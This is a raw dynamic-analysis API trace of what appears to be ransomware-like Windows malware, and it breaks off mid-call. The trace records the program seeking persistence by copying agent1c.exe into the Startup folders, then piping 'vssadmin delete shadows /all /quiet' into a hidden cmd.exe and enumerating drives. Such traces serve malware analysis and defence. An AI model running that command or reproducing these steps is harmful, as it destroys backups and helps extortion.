[0261.018] RegCloseKey (hKey=0xe4) returned 0x0 [0261.018] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dbf18 | out: hHeap=0x4a0000) returned 1 [0261.018] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0261.018] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8c) returned 0x4dbf18 [0261.018] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe4) returned 0x0 [0261.018] RegQueryValueExW (in: hKey=0xe4, lpValueName="Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x50ee70, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18fd50*=0x98) returned 0x0 [0261.018] RegCloseKey (hKey=0xe4) returned 0x0 [0261.018] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dbf18 | out: hHeap=0x4a0000) returned 1 [0261.018] lstrlenW (lpString="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 75 [0261.018] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0261.018] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dbe10 | out: hHeap=0x4a0000) returned 1 [0261.018] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe", lpDst=0x4fee68, nSize=0x7fff | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe") returned 0x68 [0261.018] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x50ee70 | out: hHeap=0x4a0000) returned 1 [0261.019] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fee68 | out: hHeap=0x4a0000) returned 1 [0261.019] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x100000) returned 0x1ff0020 [0261.019] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d78 [0261.019] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d78, Size=0x20) returned 0x4d9b70 [0261.019] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d78 [0261.019] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d78, Size=0x20) returned 0x4d9bc0 [0261.019] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74da0000 [0261.019] GetProcAddress (hModule=0x74da0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74dcd650 [0261.019] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0261.019] lstrlenW (lpString="kernel32.dll") returned 12 [0261.019] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9b70 | out: hHeap=0x4a0000) returned 1 [0261.019] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0261.019] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9bc0 | out: hHeap=0x4a0000) returned 1 [0261.019] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\agent1c.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0261.019] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\agent1c.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0261.019] CloseHandle (hObject=0xe4) returned 1 [0261.019] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d78 [0261.019] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d78, Size=0x20) returned 0x4d9bc0 [0261.020] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d78 [0261.020] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d78, Size=0x20) returned 0x4d9b70 [0261.020] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74da0000 [0261.020] GetProcAddress (hModule=0x74da0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74dcd650 [0261.020] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0261.020] lstrlenW (lpString="kernel32.dll") returned 12 [0261.020] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9b70 | out: hHeap=0x4a0000) returned 1 [0261.020] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0261.020] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9bc0 | out: hHeap=0x4a0000) returned 1 [0261.020] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1ff0020 | out: hHeap=0x4a0000) returned 1 [0261.020] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x4fee68 [0261.020] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x50ee70 [0261.020] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d78 [0261.020] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d78, Size=0x20) returned 0x4d9bc0 [0261.020] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9bc0, Size=0x40) returned 0x4dac88 [0261.020] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dac88, Size=0x80) returned 0x51ee90 [0261.020] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x51ee90, Size=0x100) returned 0x4dbe10 [0261.020] lstrlenW (lpString="") returned 0 [0261.020] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0261.020] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8c) returned 0x4dbf18 [0261.020] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe4) returned 0x0 [0261.020] RegQueryValueExW (in: hKey=0xe4, lpValueName="Common Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x50ee70, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18fd50*=0x78) returned 0x0 [0261.020] RegCloseKey (hKey=0xe4) returned 0x0 [0261.020] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dbf18 | out: hHeap=0x4a0000) returned 1 [0261.020] lstrlenW (lpString="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 59 [0261.020] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0261.020] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dbe10 | out: hHeap=0x4a0000) returned 1 [0261.020] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe", lpDst=0x4fee68, nSize=0x7fff | out: lpDst="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe") returned 0x49 [0261.020] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x50ee70 | out: hHeap=0x4a0000) returned 1 [0261.021] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fee68 | out: hHeap=0x4a0000) returned 1 [0261.021] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x100000) returned 0x1ff0020 [0261.021] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d78 [0261.021] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d78, Size=0x20) returned 0x4d9bc0 [0261.021] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d78 [0261.021] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d78, Size=0x20) returned 0x4d9b70 [0261.021] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74da0000 [0261.021] GetProcAddress (hModule=0x74da0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74dcd650 [0261.021] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0261.021] lstrlenW (lpString="kernel32.dll") returned 12 [0261.021] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9bc0 | out: hHeap=0x4a0000) returned 1 [0261.021] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0261.021] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9b70 | out: hHeap=0x4a0000) returned 1 [0261.021] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\agent1c.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0261.021] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\agent1c.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0261.022] CloseHandle (hObject=0xe4) returned 1 [0261.022] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d78 [0261.022] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d78, Size=0x20) returned 0x4d9b70 [0261.022] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d78 [0261.022] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d78, Size=0x20) returned 0x4d9bc0 [0261.022] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74da0000 [0261.022] GetProcAddress (hModule=0x74da0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74dcd650 [0261.022] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0261.022] lstrlenW (lpString="kernel32.dll") returned 12 [0261.022] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9bc0 | out: hHeap=0x4a0000) returned 1 [0261.022] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0261.022] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9b70 | out: hHeap=0x4a0000) returned 1 [0261.022] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1ff0020 | out: hHeap=0x4a0000) returned 1 [0261.022] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dee58 | out: hHeap=0x4a0000) returned 1 [0261.022] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eee60 | out: hHeap=0x4a0000) returned 1 [0261.022] lstrlenW (lpString="%windir%\\System32") returned 17 [0261.022] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dabf8 | out: hHeap=0x4a0000) returned 1 [0261.022] lstrlenW (lpString="%appdata%") returned 9 [0261.022] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4640 | out: hHeap=0x4a0000) returned 1 [0261.022] lstrlenW (lpString="%sh(Startup)%") returned 13 [0261.022] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4618 | out: hHeap=0x4a0000) returned 1 [0261.022] lstrlenW (lpString="%sh(Common Startup)%") returned 20 [0261.022] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dac40 | out: hHeap=0x4a0000) returned 1 [0261.022] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d78 [0261.022] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d78, Size=0x20) returned 0x4b4618 [0261.022] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b4618, Size=0x40) returned 0x4dac40 [0261.022] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dac40, Size=0x80) returned 0x51ee90 [0261.022] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d78 [0261.022] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d78, Size=0x20) returned 0x4b4618 [0261.022] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1fffc) returned 0x4dee58 [0261.022] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x4fee60 [0261.022] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x50ee68 [0261.023] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d78 [0261.023] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d78, Size=0x20) returned 0x4b4640 [0261.023] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b4640, Size=0x40) returned 0x4dac40 [0261.023] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dac40, Size=0x80) returned 0x51ef18 [0261.023] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x51ef18, Size=0x100) returned 0x4dbe10 [0261.023] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0261.023] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dbe10 | out: hHeap=0x4a0000) returned 1 [0261.023] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x4fee60, nSize=0x7fff | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c [0261.023] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x50ee68 | out: hHeap=0x4a0000) returned 1 [0261.023] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fee60 | out: hHeap=0x4a0000) returned 1 [0261.065] CreatePipe (in: hReadPipe=0x18fd58, hWritePipe=0x18fd5c, lpPipeAttributes=0x18fd48, nSize=0x0 | out: hReadPipe=0x18fd58*=0xe8, hWritePipe=0x18fd5c*=0xec) returned 1 [0261.082] CreatePipe (in: hReadPipe=0x18fdc8, hWritePipe=0x18fdcc, lpPipeAttributes=0x18fd48, nSize=0x0 | out: hReadPipe=0x18fdc8*=0xf0, hWritePipe=0x18fdcc*=0xf4) returned 1 [0261.082] SetHandleInformation (hObject=0xec, dwMask=0x1, dwFlags=0x0) returned 1 [0261.082] SetHandleInformation (hObject=0xf0, dwMask=0x1, dwFlags=0x0) returned 1 [0261.082] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fd68*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4), lpProcessInformation=0x18fdb8 | out: lpCommandLine=0x0, lpProcessInformation=0x18fdb8*(hProcess=0xfc, hThread=0xf8, dwProcessId=0x610, dwThreadId=0x614)) returned 1 [0261.467] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0261.467] WriteFile (in: hFile=0xec, lpBuffer=0x51ee90*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x18fd64, lpOverlapped=0x0 | out: lpBuffer=0x51ee90*, lpNumberOfBytesWritten=0x18fd64*=0x41, lpOverlapped=0x0) returned 1 [0261.467] CloseHandle (hObject=0xfc) returned 1 [0261.467] CloseHandle (hObject=0xf8) returned 1 [0261.467] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dee58 | out: hHeap=0x4a0000) returned 1 [0261.467] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0261.467] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x51ee90 | out: hHeap=0x4a0000) returned 1 [0261.467] lstrlenW (lpString="%comspec%") returned 9 [0261.467] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4618 | out: hHeap=0x4a0000) returned 1 [0261.467] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a530, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf8 [0261.468] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4d4d78 [0261.468] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a710, lpParameter=0x4d4d78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0261.469] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x4d94b8 [0261.469] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4098e0, lpParameter=0x4d94b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x104 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d90 [0261.470] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d90, Size=0x20) returned 0x4b4618 [0261.470] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b4618, Size=0x40) returned 0x4dac40 [0261.470] lstrlenW (lpString="ABCDEFGHIJKLMNOPQRSTUVWXYZ") returned 26 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xd0) returned 0x4dbe10 [0261.470] GetLogicalDrives () returned 0x4 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10014) returned 0x4dee58 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d90 [0261.470] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d4d90, Size=0x20) returned 0x4b4618 [0261.470] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b4618, Size=0x40) returned 0x4dacd0 [0261.470] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dacd0, Size=0x80) returned 0x51ee90 [0261.470] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x51ee90, Size=0x100) returned 0x4dda20 [0261.470] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dda20, Size=0x200) returned 0x4dda20 [0261.470] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dda20, Size=0x400) returned 0x4dd408 [0261.470] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dd408, Size=0x800) returned 0x520e78 [0261.470] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x520e78, Size=0x1000) returned 0x520e78 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10000) returned 0x4eee78 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d90 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4d4e68 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x4d94c8 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4d4e80 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x4d9480 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4d4e98 [0261.470] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9480, Size=0x8) returned 0x4d9480 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4d4eb0 [0261.470] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9480, Size=0x10) returned 0x4d9480 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4d4ec8 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4d4ee0 [0261.470] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9480, Size=0x20) returned 0x4d9578 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4d4ef8 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x4d9480 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x4d4f10 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x4d4f28 [0261.470] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9578, Size=0x40) returned 0x4d9578 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x4d4f40 [0261.470] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x4d4f58 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x4d4f70 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x4d4f88 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4d4fa0 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4d4fb8 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x4d9490 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4d4fd0 [0261.471] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9578, Size=0x80) returned 0x4dbee8 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4d4fe8 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4d5000 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4d5018 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd420 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd438 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4dd450 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd468 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x4dd808 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd480 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd498 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4dd4b0 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd4c8 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4dd4e0 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd4f8 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4dd510 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd528 [0261.471] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dbee8, Size=0x100) returned 0x4dda20 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd540 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd558 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd570 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4dd588 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd5a0 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd5b8 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x521e98 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd5d0 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd5e8 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd600 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x6) returned 0x521ea8 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd618 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd630 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x521eb8 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd648 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd660 [0261.471] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4dd678 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd690 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd6a8 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd6c0 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x4dd6d8 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd6f0 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4dd708 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd720 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd738 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd750 [0261.472] RtlAllocateHeap 